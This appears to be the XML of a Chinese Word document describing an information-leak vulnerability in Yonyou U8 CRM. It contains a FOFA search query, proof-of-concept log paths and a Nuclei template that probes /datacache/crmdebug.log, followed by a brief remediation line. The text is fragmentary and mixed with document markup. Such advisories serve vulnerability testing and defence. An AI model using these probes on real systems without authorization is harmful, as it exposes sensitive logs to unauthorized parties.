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用友-u8-crm信息泄露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用友-u8-crm</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>信息泄露,攻击者可通过此漏洞获取敏感信息。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app="用友U8CRM"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6075" cy="1734820"/>
            <wp:effectExtent l="0" t="0" r="1460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58381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POC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/datacache/crmdebug.log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/datacache/solr.log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583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Nuclei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id: yongyou-u8crm-datacache-crmdebug-infoleak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info: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name: yongyou-u8crm-datacache-crmdebug-infoleak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author: m0be1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severity: high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- raw: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- |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HEAD /datacache/crmdebug.log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Host: {{Hostname}}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User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36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Connection: close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matchers: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- type: dsl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dsl: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- 'status_code==200 &amp;&amp; contains_all(all_headers,"text/plain")'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1、禁止访问敏感页面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1B3D9"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FFD1B3D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A7E04A3"/>
    <w:rsid w:val="0E7234DA"/>
    <w:rsid w:val="3F7042D1"/>
    <w:rsid w:val="752A2ADB"/>
    <w:rsid w:val="7C1A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2024-01-04T01:53:00Z</dcterms:created>
  <dc:creator>wll</dc:creator>
  <cp:lastModifiedBy>----末悲</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-04T07:13:53Z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8AA38E8927F742F0A3FFAF12CB11EE26_12</vt:lpwstr>
  </property>
</Properties>
</file>